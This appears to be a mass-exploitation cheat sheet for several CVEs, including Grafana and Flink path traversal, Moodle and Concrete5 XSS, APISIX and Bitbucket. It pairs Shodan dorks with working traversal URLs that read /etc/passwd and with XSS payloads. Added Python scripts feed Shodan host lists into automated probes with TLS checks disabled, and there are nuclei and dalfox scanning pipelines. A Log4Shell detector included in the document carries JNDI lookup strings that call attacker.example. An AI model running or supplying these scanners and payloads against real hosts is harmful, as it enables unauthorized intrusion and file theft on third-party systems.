Mass exploitation of Apache APISIX Dashboard Unauthorized Access Vulnerability (CVE-2021-45232)
Description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks: `droplet` is layered on top of `gin`, and all APIs and the authentication middleware are built on `droplet`. Some APIs, however, are registered directly on the `gin` router, so requests to them never pass through the `droplet` authentication middleware and can be called without authentication.
Shodan Dork : http.title:"Apache APISIX Dashboard"
Run the command below to get a list of hosts running the Apache APISIX Dashboard, one ip:port per line (tee -a appends, so temp.txt accumulates across runs):
shodan search 'http.title:"Apache APISIX Dashboard"' --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a temp.txt
Apache Log4j2 Remote Code Execution (Log4Shell, CVE-2021-44228)
Description: Apache Log4j2 versions up to and including 2.14.1 (excluding the security release 2.12.2) are vulnerable to remote code execution. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Prerequisite
Docker must be installed. See the link below for how to install Docker on Kali Linux:
https://youtu.be/xN2JGqiqgow
Steps
A) Download the Log4j vulnerable app from the GitHub link below
https://github.com/simrotion13/log4shell-vulnerable-app
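Added example, not code from this gist or from the vulnerable-app repository: the detection side of the description above. It takes access-log lines, peels off the nested lookup layers attackers use to hide the literal `jndi:` (`${lower:…}`, `${upper:…}` and the `${::-…}` / `${env:NOPE:-…}` default-value trick), and only then matches. The log lines and the attacker host names are constructed for the example.

```python
import re

# Innermost ${...} that contains no further lookup.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting once the obfuscation layers are resolved.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve(inner):
    """Evaluate the lookups used to hide 'jndi'; None means leave the lookup untouched."""
    key = inner.lower()
    if key.startswith("jndi:"):          # the target itself: never rewrite it
        return None
    if key.startswith("lower:"):         # ${lower:J} -> j
        return inner[6:].lower()
    if key.startswith("upper:"):         # ${upper:j} -> J
        return inner[6:].upper()
    if ":-" in inner:                    # ${::-j} / ${env:NOPE:-j}: default value wins
        return inner.split(":-", 1)[1]
    return None


def normalize_lookups(text, max_rounds=32):
    """Rewrite nested lookups innermost-first until nothing more resolves."""
    for _ in range(max_rounds):
        resolved = False

        def repl(match):
            nonlocal resolved
            value = _resolve(match.group(1))
            if value is None:
                return match.group(0)
            resolved = True
            return value

        text = INNERMOST.sub(repl, text)
        if not resolved:
            break
    return text


def is_log4shell_probe(line):
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return bool(JNDI_RE.search(normalize_lookups(line)))


# Constructed access-log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET /?x=${${env:NOPE:-j}ndi:dns://attacker.example/a} HTTP/1.1" 404 "-"',
    '10.0.0.10 - - "GET /?x=${java:version} HTTP/1.1" 200 "-"',
]


def find_probes(lines=SAMPLE_LOG):
    """1-based indexes of the lines that contain a JNDI lookup."""
    return [i for i, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx in find_probes():
        print(idx, normalize_lookups(SAMPLE_LOG[idx - 1]))
```

The point is that the match runs after normalization: a plain grep for `jndi` on the raw line misses three of the four probes in the sample, while the harmless `${java:version}` lookup on the last line is correctly left alone.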
Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798)
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for the patched versions) are vulnerable to directory traversal, allowing unauthenticated access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL :
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
The plugin id in the path (alertlist here) can be any plugin installed on the instance. Keep the ../ URL-encoded as %2f: most HTTP clients normalize a literal ../ away before the request leaves (curl needs --path-as-is for the literal form).
Shodan Dork : http.title:"grafana"
Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]
Description: A change introduced in Apache Flink 1.11.0 (and also shipped in 1.11.1 and 1.11.2) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
Shodan Dork : 'Apache Flink'
Affected Versions : 1.11.0, 1.11.1 and 1.11.2 (fixed in 1.11.3 and 1.12.0)
Vulnerable URL (the JobManager REST port is 8081 by default and speaks plain HTTP unless TLS was configured) :
http://IP:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Note the double URL-encoding (%252f rather than %2f); keep it exactly as shown, the single-encoded form is not equivalent here.
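Added example, not part of the gist, serving both the Grafana and the Flink traversal above: it reads the ip:port list produced by the shodan pipeline at the top of the page, builds the product-specific traversal URL, and decides from the body whether /etc/passwd actually came back rather than a 200 carrying a JSON error page. The addresses are placeholders and the User-Agent string is an assumption; only the pure functions are exercised offline.

```python
import re
import ssl
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Traversal paths from the page: Grafana takes a single-encoded "../",
# the Flink JobManager needs the double-encoded form ("%252f").
TRAVERSAL_PATHS = {
    "grafana": "/public/plugins/alertlist/" + "..%2f" * 8 + "etc/passwd",
    "flink": "/jobmanager/logs/" + "..%252f" * 12 + "etc%252fpasswd",
}

# A real /etc/passwd has the root entry at the start of a line; JSON error
# bodies and login pages never do.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:0:", re.M)

HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"}  # assumed UA

# Mass scans hit plenty of self-signed certificates; do not let them abort the run.
_CTX = ssl.create_default_context()
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE


def parse_targets(lines):
    """Turn 'ip:port' lines (the shodan | awk output on this page) into unique (host, port) pairs."""
    seen, targets = set(), []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        host, _, port = line.rpartition(":")
        if not port.isdigit():
            continue
        pair = (host, int(port))
        if pair not in seen:
            seen.add(pair)
            targets.append(pair)
    return targets


def build_url(product, host, port, scheme="http"):
    return f"{scheme}://{host}:{port}{TRAVERSAL_PATHS[product]}"


def looks_like_passwd(body):
    return bool(PASSWD_RE.search(body))


def classify(status, body):
    """Verdict for one probe: only a 200 whose body is a passwd file counts."""
    if status == 200 and looks_like_passwd(body):
        return "vulnerable"
    if status in (401, 403):
        return "blocked"        # WAF or auth in front of the path; inconclusive
    return "not-vulnerable"


def check_target(product, host, port, scheme="http", timeout=5):
    """Send the probe over the network and return (url, verdict)."""
    url = build_url(product, host, port, scheme)
    try:
        with urlopen(Request(url, headers=HEADERS), timeout=timeout, context=_CTX) as resp:
            return url, classify(resp.getcode(), resp.read(4096).decode("utf-8", "replace"))
    except HTTPError as err:
        return url, classify(err.code, err.read(4096).decode("utf-8", "replace"))
    except (URLError, OSError):
        return url, "unreachable"


def check_all(product, lines, scheme="http"):
    return [check_target(product, host, port, scheme) for host, port in parse_targets(lines)]


if __name__ == "__main__":
    import sys
    product = sys.argv[1]             # "grafana" or "flink"
    with open(sys.argv[2]) as fh:     # temp.txt from the shodan pipeline
        for url, verdict in check_all(product, fh):
            print(verdict, url)
```

Run it as `python3 traverse_check.py grafana temp.txt`; a `blocked` verdict is worth a second look by hand, since a 403 from a proxy says nothing about the Grafana or Flink instance behind it.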
Moodle XSS vulnerability
Shodan Dork : 'http.component:Moodle'
Vulnerable URL :
https://IP/mod/lti/auth.php?redirect_uri=javascript:alert(document.domain)
The results can be downloaded with the command below (a paid Shodan API key is needed for download):
shodan download moodle 'http.component:Moodle'
Concrete5 CMS XSS vulnerability (tweet by Jackson)
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
URL-encode the cID value when sending it from a client that does not do so for you (for curl: -G --data-urlencode 'cID=...').
The results can be downloaded with the command below (a paid Shodan API key is needed for download):
shodan download concrete5 'Set-Cookie: CONCRETE5'
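Added example (not the gist author's code) covering both reflected-XSS checks above. It encodes the payload for transport and, for the Moodle case, does not stop at "the payload is somewhere in the response": a javascript: URL only executes when it lands in href/src/action, so the checker looks for it in exactly those attributes, while the Concrete5 tag-breakout payload counts as soon as it is reflected verbatim. The response bodies are constructed, not captured from real Moodle or Concrete5 installs, and the host names are placeholders.

```python
import html
import re
import ssl
from urllib.error import HTTPError, URLError
from urllib.parse import quote
from urllib.request import Request, urlopen

# Payloads and paths exactly as in the two URLs above.
PAYLOADS = {
    "moodle": "javascript:alert(document.domain)",
    "concrete5": '"></iframe><img/src/onerror=.1|alert(document.domain)>',
}
PROBE_PATHS = {
    "moodle": "/mod/lti/auth.php?redirect_uri={payload}",
    "concrete5": "/ccm/system/panels/page/preview_as_user/preview?cID={payload}",
}

# Attributes whose value gets navigated or loaded, i.e. where a javascript: URL runs.
URL_ATTR_RE = re.compile(
    r"""\b(href|src|action|formaction)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

_CTX = ssl.create_default_context()          # tolerate self-signed certs on mass scans
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE


def build_url(product, host, port, scheme="https"):
    encoded = quote(PAYLOADS[product], safe="")   # the raw payload is not URL-safe
    return f"{scheme}://{host}:{port}" + PROBE_PATHS[product].format(payload=encoded)


def reflection_state(body, payload):
    """'raw' if echoed verbatim, 'escaped' if only the HTML-escaped form appears, else 'absent'."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def url_attributes_starting_with(body, payload):
    """Names of URL-bearing attributes whose value starts with the payload."""
    names = []
    for match in URL_ATTR_RE.finditer(body):
        value = next(v for v in match.groups()[1:] if v is not None)
        if value.strip().lower().startswith(payload.lower()):
            names.append(match.group(1).lower())
    return names


def assess(product, body):
    """Verdict for one response body."""
    payload = PAYLOADS[product]
    state = reflection_state(body, payload)
    if product == "moodle":
        # A javascript: URL in page text is harmless; it fires only from href/src/action.
        attrs = url_attributes_starting_with(body, payload)
        verdict = "likely-vulnerable" if attrs else ("reflected-in-text" if state == "raw" else "safe")
        return {"reflection": state, "attributes": attrs, "verdict": verdict}
    # Tag-breakout payload: verbatim reflection anywhere in the HTML is enough.
    return {"reflection": state, "attributes": [],
            "verdict": "likely-vulnerable" if state == "raw" else "safe"}


def check_target(product, host, port, scheme="https", timeout=5):
    url = build_url(product, host, port, scheme)
    try:
        with urlopen(Request(url), timeout=timeout, context=_CTX) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
    except HTTPError as err:
        body = err.read(65536).decode("utf-8", "replace")
    except (URLError, OSError):
        return url, {"verdict": "unreachable"}
    return url, assess(product, body)


# Constructed response bodies: one vulnerable and one fixed shape per product.
MOODLE_VULN = ('<form action="javascript:alert(document.domain)" method="post">'
               '<input type="hidden" name="state" value="abc"></form>')
MOODLE_SAFE = '<div class="alert">Invalid redirect URI: javascript:alert(document.domain)</div>'
C5_VULN = '<iframe src="/index.php?cID="></iframe><img/src/onerror=.1|alert(document.domain)>"></iframe>'
C5_SAFE = ('<iframe src="/index.php?cID=&quot;&gt;&lt;/iframe&gt;&lt;img/src/onerror=.1|'
           'alert(document.domain)&gt;"></iframe>')
```

The `reflected-in-text` verdict is the interesting one for Moodle: the payload came back, but in a place where it cannot execute, which is what a proper fix (rejecting the redirect_uri and printing it as text) looks like.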
#!/bin/bash
# Usage: ./recon.sh <targets-file> <resolvers-file>
filename=$1
resolversFile=$2          # resolver list for the DNS step (not part of this fragment)
resultDir=~/recon/output
nucleiTmpDir=~/nuclei-templates
Header='User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'
mkdir -p "$resultDir"
nuclei -ut                # update the template set before scanning
while read -r line; do
    [ -z "$line" ] && continue
    safe=${line//[^A-Za-z0-9.]/_}   # target name made filesystem-safe for its report
    nuclei -u "$line" -H "$Header" -t "$nucleiTmpDir" -o "$resultDir/$safe.txt"
done < "$filename"
#python3 needed
#Install mmh3 by running: pip install mmh3
import mmh3
import requests
import codecs
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Fetch the favicon; verify=False skips TLS validation for hosts with self-signed certs
response = requests.get('https://licious.in/favicon.ico', verify=False)
# Shodan hashes the base64 encoding of the icon bytes (codecs' wrapped form, newlines included) with MurmurHash3
favicon = codecs.encode(response.content, "base64")
favhash = mmh3.hash(favicon)
print(f'http.favicon.hash:{favhash}')
# targets_urls.txt (one URL per line):
http://testphp.vulnweb.com
## Command Line
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
# Tools used
# https://github.com/jaeles-project/gospider
# https://github.com/tomnomnom/qsreplace
# https://github.com/hahwul/dalfox
Hi guys,
Today we explore the Atlassian Bitbucket Command Injection Vulnerability (CVE-2022-36804).
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, 7.7.0 before version 7.17.10, 7.18.0 before version 7.21.4, 8.0.0 before version 8.0.3, 8.1.0 before version 8.1.3, 8.2.0 before version 8.2.2, and 8.3.0 before version 8.3.1 allow remote attackers with read permission to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
Shodan Dork : 'http.component:"BitBucket"'
Run the command below to download the results (a paid Shodan API key is needed for download):
shodan download bitbucket 'http.component:"BitBucket"'
This writes bitbucket.json.gz and fetches 1000 results by default; pass --limit N for more (or --limit -1 for everything the query returns).
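Added example, not from the gist: turning the `shodan download` output used throughout this page (a gzipped file with one JSON banner per line) into a de-duplicated list of base URLs for the checks above, picking https when the banner carries an ssl block and preferring the banner's hostname over the bare IP so TLS name checks and virtual hosts work. The records are constructed to mimic the banner shape; the addresses and host names are reserved example values.

```python
import gzip
import json
import os
import tempfile

# Constructed records in the shape `shodan download` writes (one JSON object per line).
SAMPLE_RECORDS = [
    {"ip_str": "203.0.113.10", "port": 7990, "transport": "tcp", "hostnames": ["git.example.test"],
     "http": {"title": "Log in - Bitbucket"}},
    {"ip_str": "203.0.113.11", "port": 443, "transport": "tcp", "hostnames": [],
     "ssl": {"cert": {"subject": {"CN": "bitbucket.example.test"}}},
     "http": {"title": "Log in - Bitbucket"}},
    {"ip_str": "203.0.113.10", "port": 7990, "transport": "tcp", "hostnames": ["git.example.test"],
     "http": {"title": "Log in - Bitbucket"}},                      # duplicate banner
    {"ip_str": "203.0.113.12", "port": 22, "transport": "tcp", "hostnames": [],
     "data": "SSH-2.0-OpenSSH_8.9"},                                # not an HTTP service
]


def targets_from_records(records, title_filter=None):
    """Unique 'scheme://host:port' base URLs from Shodan banner records.

    Banners without an 'http' block are dropped; the presence of 'ssl' selects https;
    an optional case-insensitive substring filter is applied to the HTTP title.
    """
    seen, out = set(), []
    for rec in records:
        http = rec.get("http")
        if not http:
            continue
        if title_filter and title_filter.lower() not in (http.get("title") or "").lower():
            continue
        scheme = "https" if "ssl" in rec else "http"
        host = (rec.get("hostnames") or [rec["ip_str"]])[0]
        base = f"{scheme}://{host}:{rec['port']}"
        if base not in seen:
            seen.add(base)
            out.append(base)
    return out


def targets_from_download(path, title_filter=None):
    """Read a `shodan download` file such as bitbucket.json.gz."""
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        records = (json.loads(line) for line in fh if line.strip())
        return targets_from_records(records, title_filter)


def write_sample_download(path):
    """Write the constructed records in the same gzipped JSON-lines layout."""
    with gzip.open(path, "wt", encoding="utf-8") as fh:
        for rec in SAMPLE_RECORDS:
            fh.write(json.dumps(rec) + "\n")


def demo():
    """Round-trip the constructed records through a real .json.gz file."""
    fd, path = tempfile.mkstemp(suffix=".json.gz")
    os.close(fd)
    try:
        write_sample_download(path)
        return targets_from_download(path, title_filter="bitbucket")
    finally:
        os.remove(path)


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    for base in (targets_from_download(path, "bitbucket") if path else demo()):
        print(base)
```

Run it as `python3 shodan_targets.py bitbucket.json.gz`; without an argument it prints the result for the constructed records.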